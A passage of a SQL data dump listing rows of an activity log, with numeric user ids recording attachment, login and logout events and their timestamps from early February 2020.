18:21:39',NULL),(23831,2,'Attachment',288,'2020-02-01 18:21:39','2020-02-01 18:21:39',NULL),(23832,2,'Attachment',181,'2020-02-01 18:21:39','2020-02-01 18:21:39',NULL),(23833,2,'Attachment',753,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23834,2,'Attachment',538,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23835,2,'Attachment',419,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23836,2,'Attachment',539,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23837,2,'Attachment',541,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23838,2,'Attachment',181,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23839,2,'Attachment',416,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23840,2,'Attachment',535,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23841,2,'Attachment',546,'2020-02-01 18:21:54','2020-02-01 18:21:54',NULL),(23842,2,'Attachment',288,'2020-02-01 18:21:55','2020-02-01 18:21:55',NULL),(23843,2,'Attachment',546,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23844,2,'Attachment',538,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23845,2,'Attachment',539,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23846,2,'Attachment',541,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23847,2,'Attachment',535,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23848,2,'Attachment',288,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23849,2,'Attachment',181,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23850,2,'Attachment',419,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23851,2,'Attachment',416,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23852,2,'Attachment',753,'2020-02-01 18:33:07','2020-02-01 18:33:07',NULL),(23853,2,'Attachment',755,'2020-02-01 18:34:08','2020-02-01 18:34:08',NULL),(23854,2,'Attachment',757,'2020-02-01 18:34:08','2020-02-01 18:34:08',NULL),(23855,2,'Attachment',535,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23856,2,'Attachment',538,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23857,2,'Attachment',539,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23858,2,'Attachment',541,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23859,2,'Attachment',546,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23860,2,'Attachment',753,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23861,2,'Attachment',416,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23862,2,'Attachment',419,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23863,2,'Attachment',288,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23864,2,'Attachment',181,'2020-02-01 18:45:48','2020-02-01 18:45:48',NULL),(23865,2,'Attachment',535,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23866,2,'Attachment',538,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23867,2,'Attachment',539,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23868,2,'Attachment',753,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23869,2,'Attachment',546,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23870,2,'Attachment',541,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23871,2,'Attachment',416,'2020-02-01 18:49:00','2020-02-01 18:49:00',NULL),(23872,2,'Attachment',419,'2020-02-01 18:49:01','2020-02-01 18:49:01',NULL),(23873,2,'Attachment',288,'2020-02-01 18:49:01','2020-02-01 18:49:01',NULL),(23874,2,'Attachment',181,'2020-02-01 18:49:01','2020-02-01 18:49:01',NULL),(23875,2,'Attachment',535,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23876,2,'Attachment',538,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23877,2,'Attachment',539,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23878,2,'Attachment',541,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23879,2,'Attachment',416,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23880,2,'Attachment',419,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23881,2,'Attachment',753,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23882,2,'Attachment',546,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23883,2,'Attachment',181,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23884,2,'Attachment',288,'2020-02-01 18:51:21','2020-02-01 18:51:21',NULL),(23885,2,'Attachment',539,'2020-02-01 19:58:22','2020-02-01 19:58:22',NULL),(23886,2,'Attachment',288,'2020-02-01 19:58:22','2020-02-01 19:58:22',NULL),(23887,2,'Attachment',419,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23888,2,'Attachment',753,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23889,2,'Attachment',535,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23890,2,'Attachment',546,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23891,2,'Attachment',416,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23892,2,'Attachment',181,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23893,2,'Attachment',541,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23894,2,'Attachment',538,'2020-02-01 19:58:23','2020-02-01 19:58:23',NULL),(23895,2,'Attachment',538,'2020-02-01 19:59:44','2020-02-01 19:59:44',NULL),(23896,2,'Attachment',535,'2020-02-01 19:59:44','2020-02-01 19:59:44',NULL),(23897,2,'Attachment',539,'2020-02-01 19:59:44','2020-02-01 19:59:44',NULL),(23898,2,'Attachment',541,'2020-02-01 19:59:44','2020-02-01 19:59:44',NULL),(23899,2,'Attachment',753,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23900,2,'Attachment',546,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23901,2,'Attachment',416,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23902,2,'Attachment',419,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23903,2,'Attachment',288,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23904,2,'Attachment',181,'2020-02-01 19:59:45','2020-02-01 19:59:45',NULL),(23905,2,'Attachment',757,'2020-02-01 20:00:05','2020-02-01 20:00:05',NULL),(23906,2,'Attachment',755,'2020-02-01 20:00:05','2020-02-01 20:00:05',NULL),(23907,2,'Attachment',535,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23908,2,'Attachment',538,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23909,2,'Attachment',539,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23910,2,'Attachment',541,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23911,2,'Attachment',546,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23912,2,'Attachment',753,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23913,2,'Attachment',416,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23914,2,'Attachment',419,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23915,2,'Attachment',288,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23916,2,'Attachment',181,'2020-02-01 20:34:13','2020-02-01 20:34:13',NULL),(23917,2,'Attachment',535,'2020-02-01 21:06:57','2020-02-01 21:06:57',NULL),(23918,2,'Attachment',538,'2020-02-01 21:06:57','2020-02-01 21:06:57',NULL),(23919,2,'Attachment',539,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23920,2,'Attachment',541,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23921,2,'Attachment',546,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23922,2,'Attachment',753,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23923,2,'Attachment',416,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23924,2,'Attachment',419,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23925,2,'Attachment',288,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23926,2,'Attachment',181,'2020-02-01 21:06:58','2020-02-01 21:06:58',NULL),(23927,2,'Attachment',535,'2020-02-01 21:14:36','2020-02-01 21:14:36',NULL),(23928,2,'Attachment',546,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23929,2,'Attachment',538,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23930,2,'Attachment',539,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23931,2,'Attachment',181,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23932,2,'Attachment',753,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23933,2,'Attachment',416,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23934,2,'Attachment',288,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23935,2,'Attachment',419,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23936,2,'Attachment',541,'2020-02-01 21:14:37','2020-02-01 21:14:37',NULL),(23937,76,'Login',76,'2020-02-01 21:15:07','2020-02-01 21:15:07',NULL),(23938,2,'Attachment',535,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23939,2,'Attachment',541,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23940,2,'Attachment',538,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23941,2,'Attachment',539,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23942,2,'Attachment',416,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23943,2,'Attachment',288,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23944,2,'Attachment',181,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23945,2,'Attachment',419,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23946,2,'Attachment',546,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23947,2,'Attachment',753,'2020-02-01 22:25:20','2020-02-01 22:25:20',NULL),(23948,76,'Attachment',757,'2020-02-01 22:29:26','2020-02-01 22:29:26',NULL),(23949,76,'Attachment',755,'2020-02-01 22:29:26','2020-02-01 22:29:26',NULL),(23950,2,'Attachment',416,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23951,2,'Attachment',541,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23952,2,'Attachment',181,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23953,2,'Attachment',419,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23954,2,'Attachment',538,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23955,2,'Attachment',288,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23956,2,'Attachment',535,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23957,2,'Attachment',539,'2020-02-01 22:58:29','2020-02-01 22:58:29',NULL),(23958,2,'Attachment',546,'2020-02-01 22:58:30','2020-02-01 22:58:30',NULL),(23959,75,'Login',75,'2020-02-02 09:28:15','2020-02-02 09:28:15',NULL),(23960,75,'Logout',75,'2020-02-02 09:28:42','2020-02-02 09:28:42',NULL),(23961,75,'Login',75,'2020-02-02 09:40:11','2020-02-02 09:40:11',NULL),(23962,75,'Attachment',757,'2020-02-02 10:08:31','2020-02-02 10:08:31',NULL),(23963,75,'Attachment',755,'2020-02-02 10:08:31','2020-02-02 10:08:31',NULL),(23964,77,'Login',77,'2020-02-02 23:35:44','2020-02-02 23:35:44',NULL),(23965,77,'Login',77,'2020-02-03 09:35:42','2020-02-03 09:35:42',NULL),(23966,75,'Login',75,'2020-02-03 11:38:36','2020-02-03 11:38:36',NULL),(23967,76,'Login',76,'2020-02-03 11:38:46','2020-02-03 11:38:46',NULL),(23968,77,'Attachment',539,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23969,77,'Attachment',538,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23970,77,'Attachment',416,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23971,77,'Attachment',535,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23972,77,'Attachment',541,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23973,77,'Attachment',753,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23974,77,'Attachment',546,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23975,77,'Attachment',181,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23976,77,'Attachment',288,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23977,77,'Attachment',419,'2020-02-03 11:40:04','2020-02-03 11:40:04',NULL),(23978,2,'Attachment',535,'2020-02-03 11:48:14','2020-02-03 11:48:14',NULL),(23979,2,'Attachment',538,'2020-02-03 11:48:14','2020-02-03 11:48:14',NULL),(23980,2,'Attachment',539,'2020-02-03 11:48:14','2020-02-03 11:48:14',NULL),(23981,2,'Attachment',541,'2020-02-03 11:48:14','2020-02-03 11:48:14',NULL),(23982,2,'Attachment',546,'2020-02-03 11:48:14','2020-02-03 11:48:14',NULL),(23983,2,'Attachment',753,'2020-02-03 11:48:15','2020-02-03 11:48:15',NULL),(23984,2,'Attachment',416,'2020-02-03 11:48:15','2020-02-03 11:48:15',NULL),(23985,2,'Attachment',419,'2020-02-03 11:48:15','2020-02-03 11:48:15',NULL),(23986,2,'Attachment',288,'2020-02-03 11:48:15','2020-02-03 11:48:15',NULL),(23987,2,'Attachment',181,'2020-02-03 11:48:15','2020-02-03 11:48:15',NULL),(23988,2,'Attachment',535,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23989,2,'Attachment',419,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23990,2,'Attachment',539,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23991,2,'Attachment',538,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23992,2,'Attachment',416,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23993,2,'Attachment',288,'2020-02-03 11:50:13','2020-02-03 11:50:13',NULL),(23994,2,'Attachment',546,'2020-02-03 11:50:15','2020-02-03 11:50:15',NULL),(23995,2,'Attachment',541,'2020-02-03 11:50:15','2020-02-03 11:50:15',NULL),(23996,2,'Attachment',753,'2020-02-03 11:50:15','2020-02-03 11:50:15',NULL),(23997,2,'Attachment',181,'2020-02-03 11:50:15','2020-02-03 11:50:15',NULL),(23998,2,'Attachment',535,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(23999,2,'Attachment',538,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24000,2,'Attachment',539,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24001,2,'Attachment',541,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24002,2,'Attachment',546,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24003,2,'Attachment',753,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24004,2,'Attachment',416,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24005,2,'Attachment',419,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24006,2,'Attachment',288,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24007,2,'Attachment',181,'2020-02-03 11:52:12','2020-02-03 11:52:12',NULL),(24008,2,'Attachment',535,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24009,2,'Attachment',538,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24010,2,'Attachment',539,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24011,2,'Attachment',541,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24012,2,'Attachment',546,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24013,2,'Attachment',753,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24014,2,'Attachment',416,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24015,2,'Attachment',288,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24016,2,'Attachment',419,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24017,2,'Attachment',181,'2020-02-03 12:02:11','2020-02-03 12:02:11',NULL),(24018,47,'Login',47,'2020-02-03 12:06:52','2020-02-03 12:06:52',NULL),(24019,2,'Attachment',538,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24020,2,'Attachment',535,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24021,2,'Attachment',539,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24022,2,'Attachment',541,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24023,2,'Attachment',753,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24024,2,'Attachment',546,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24025,2,'Attachment',416,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24026,2,'Attachment',419,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24027,2,'Attachment',288,'2020-02-03 16:29:35','2020-02-03 16:29:35',NULL),(24028,2,'Attachment',181,'2020-02-03 16:29:36','2020-02-03 16:29:36',NULL),(24029,2,'Attachment',535,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24030,2,'Attachment',538,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24031,2,'Attachment',539,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24032,2,'Attachment',753,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24033,2,'Attachment',416,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24034,2,'Attachment',419,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24035,2,'Attachment',288,'2020-02-03 16:29:37','2020-02-03 16:29:37',NULL),(24036,2,'Attachment',541,'2020-02-03 16:29:38','2020-02-03 16:29:38',NULL),(24037,2,'Attachment',546,'2020-02-03 16:29:38','2020-02-03 16:29:38',NULL),(24038,2,'Attachment',181,'2020-02-03 16:29:38','2020-02-03 16:29:38',NULL),(24039,2,'Attachment',288,'2020-02-03 16:29:38','2020-02-03 16:29:38',NULL),(24040,2,'Attachment',419,'2020-02-03 16:29:38','2020-02-03 16:29:38',NULL),(24041,2,'Attachment',535,'2020-02-03 16:38:27','2020-02-03 16:38:27',NULL),(24042,2,'Attachment',538,'2020-02-03 16:38:27','2020-02-03 16:38:27',NULL),(24043,2,'Attachment',539,'2020-02-03 16:38:27','2020-02-03 16:38:27',NULL),(24044,2,'Attachment',541,'2020-02-03 16:38:27','2020-02-03 16:38:27',NULL),(24045,2,'Attachment',416,'2020-02-03 16:38:27','2020-02-03 16:38:27',NULL),(24046,2,'Attachment',419,'2020-02-03 16:38:28','2020-02-03 16:38:28',NULL),(24047,2,'Attachment',288,'2020-02-03 16:38:28','2020-02-03 16:38:28',NULL),(24048,2,'Attachment',546,'2020-02-03 16:38:28','2020-02-03 16:38:28',NULL),(24049,2,'Attachment',753,'2020-02-03 16:38:28','2020-02-03 16:38:28',NULL),(24050,2,'Attachment',181,'2020-02-03 16:38:28','2020-02-03 16:38:28',NULL),(24051,55,'Login',55,'2020-02-03 16:39:09','2020-02-03 16:39:09',NULL),(24052,2,'Attachment',535,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24053,2,'Attachment',538,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24054,2,'Attachment',539,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24055,2,'Attachment',541,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24056,2,'Attachment',419,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24057,2,'Attachment',416,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24058,2,'Attachment',288,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24059,2,'Attachment',546,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24060,2,'Attachment',753,'2020-02-03 16:40:56','2020-02-03 16:40:56',NULL),(24061,2,'Attachment',181,'2020-02-03 16:40:57','2020-02-03 16:40:57',NULL),(24062,2,'Attachment',535,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24063,2,'Attachment',538,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24064,2,'Attachment',539,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24065,2,'Attachment',541,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24066,2,'Attachment',546,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24067,2,'Attachment',753,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24068,2,'Attachment',419,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24069,2,'Attachment',288,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24070,2,'Attachment',416,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24071,2,'Attachment',181,'2020-02-03 16:44:22','2020-02-03 16:44:22',NULL),(24072,2,'Attachment',399,'2020-02-03 16:44:41','2020-02-03 16:44:41',NULL),(24073,2,'Attachment',400,'2020-02-03 16:44:41','2020-02-03 16:44:41',NULL),(24074,2,'Attachment',398,'2020-02-03 16:44:41','2020-02-03 16:44:41',NULL),(24075,2,'Attachment',401,'2020-02-03 16:44:41','2020-02-03 16:44:41',NULL),(24076,2,'Attachment',402,'2020-02-03 16:44:41','2020-02-03 16:44:41',NULL),(24077,47,'Attachment',538,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24078,47,'Attachment',541,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24079,47,'Attachment',539,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24080,47,'Attachment',535,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24081,47,'Attachment',419,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24082,47,'Attachment',416,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24083,47,'Attachment',288,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24084,47,'Attachment',546,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24085,47,'Attachment',753,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24086,47,'Attachment',181,'2020-02-03 16:47:12','2020-02-03 16:47:12',NULL),(24087,47,'Login',47,'2020-02-03 16:50:44','2020-02-03 16:50:44',NULL),(24088,47,'Logout',47,'2020-02-03 16:57:29','2020-02-03 16:57:29',NULL),(24089,1,'Login',1,'2020-02-03 16:57:37','2020-02-03 16:57:37',NULL),(24090,1,'Login',1,'2020-02-03 16:59:26','2020-02-03 16:59:26',NULL),(24091,55,'Logout',55,'2020-02-03 17:12:56','2020-02-03 17:12:56',NULL),(24092,55,'Login',55,'2020-02-03 17:13:04','2020-02-03 17:13:04',NULL),(24093,55,'Logout',55,'2020-02-03 17:17:06','2020-02-03 17:17:06',NULL),(24094,1,'Logout',1,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24095,2,'Attachment',535,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24096,2,'Attachment',539,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24097,2,'Attachment',416,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24098,2,'Attachment',541,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24099,2,'Attachment',538,'2020-02-03 17:23:03','2020-02-03 17:23:03',NULL),(24100,2,'Attachment',419,'2020-02-03 17:23:04','2020-02-03 17:23:04',NULL),(24101,2,'Attachment',181,'2020-02-03 17:23:04','2020-02-03 17:23:04',NULL),(24102,2,'Attachment',288,'2020-02-03 17:23:04','2020-02-03 17:23:04',NULL),(24103,2,'Attachment',546,'2020-02-03 17:23:04','2020-02-03 17:23:04',NULL),(24104,2,'Attachment',753,'2020-02-03 17:23:04','2020-02-03 17:23:04',NULL),(24105,55,'Login',55,'2020-02-03 17:23:24','2020-02-03 17:23:24',NULL),(24106,2,'Attachment',538,'2020-02-03 17:27:38','2020-02-03 17:27:38',NULL),(24107,2,'Attachment',539,'2020-02-03 17:27:38','2020-02-03 17:27:38',NULL),(24108,2,'Attachment',419,'2020-02-03 17:27:38','2020-02-03 17:27:38',NULL),(24109,2,'Attachment',416,'2020-02-03 17:27:38','2020-02-03 17:27:38',NULL),(24110,2,'Attachment',288,'2020-02-03 17:27:47','2020-02-03 17:27:47',NULL),(24111,2,'Attachment',541,'2020-02-03 17:27:48','2020-02-03 17:27:48',NULL),(24112,2,'Attachment',546,'2020-02-03 17:27:48','2020-02-03 17:27:48',NULL),(24113,2,'Attachment',753,'2020-02-03 17:27:49','2020-02-03 17:27:49',NULL),(24114,2,'Attachment',181,'2020-02-03 17:27:49','2020-02-03 17:27:49',NULL),(24115,2,'Attachment',535,'2020-02-03 17:30:29','2020-02-03 17:30:29',NULL),(24116,2,'Attachment',535,'2020-02-03 17:36:20','2020-02-03 17:36:20',NULL),(24117,2,'Attachment',538,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24118,2,'Attachment',539,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24119,2,'Attachment',541,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24120,2,'Attachment',546,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24121,2,'Attachment',753,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24122,2,'Attachment',416,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24123,2,'Attachment',419,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24124,2,'Attachment',288,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24125,2,'Attachment',181,'2020-02-03 17:36:21','2020-02-03 17:36:21',NULL),(24126,55,'Logout',55,'2020-02-03 17:37:45','2020-02-03 17:37:45',NULL),(24127,1,'Login',1,'2020-02-03 17:37:51','2020-02-03 17:37:51',NULL),(24128,2,'Attachment',535,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24129,2,'Attachment',538,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24130,2,'Attachment',539,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24131,2,'Attachment',541,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24132,2,'Attachment',546,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24133,2,'Attachment',753,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24134,2,'Attachment',416,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24135,2,'Attachment',288,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24136,2,'Attachment',419,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24137,2,'Attachment',181,'2020-02-03 17:38:30','2020-02-03 17:38:30',NULL),(24138,48,'Login',48,'2020-02-03 17:44:26','2020-02-03 17:44:26',NULL),(24139,1,'Login',1,'2020-02-03 17:46:20','2020-02-03 17:46:20',NULL),(24140,78,'Logout',78,'2020-02-03 17:49:57','2020-02-03 17:49:57',NULL),(24141,55,'Login',55,'2020-02-03 17:50:02','2020-02-03 17:50:02',NULL),(24142,48,'Logout',48,'2020-02-03 19:41:50','2020-02-03 19:41:50',NULL),(24143,1,'Login',1,'2020-02-03 19:42:00','2020-02-03 19:42:00',NULL),(24144,1,'Logout',1,'2020-02-03 19:51:59','2020-02-03 19:51:59',NULL),(24145,48,'Login',48,'2020-02-03 19:52:14','2020-02-03 19:52:14',NULL),(24146,1,'Login',1,'2020-02-04 09:18:37','2020-02-04 09:18:37',NULL),(24147,2,'Attachment',535,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24148,2,'Attachment',546,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24149,2,'Attachment',753,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24150,2,'Attachment',538,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24151,2,'Attachment',181,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24152,2,'Attachment',541,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24153,2,'Attachment',539,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24154,2,'Attachment',419,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24155,2,'Attachment',288,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24156,2,'Attachment',416,'2020-02-04 11:32:11','2020-02-04 11:32:11',NULL),(24157,2,'Attachment',535,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24158,2,'Attachment',538,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24159,2,'Attachment',539,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24160,2,'Attachment',541,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24161,2,'Attachment',546,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24162,2,'Attachment',753,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24163,2,'Attachment',416,'2020-02-04 19:31:13','2020-02-04 19:31:13',NULL),(24164,2,'Attachment',419,'2020-02-04 19:31:13','2020-02-04 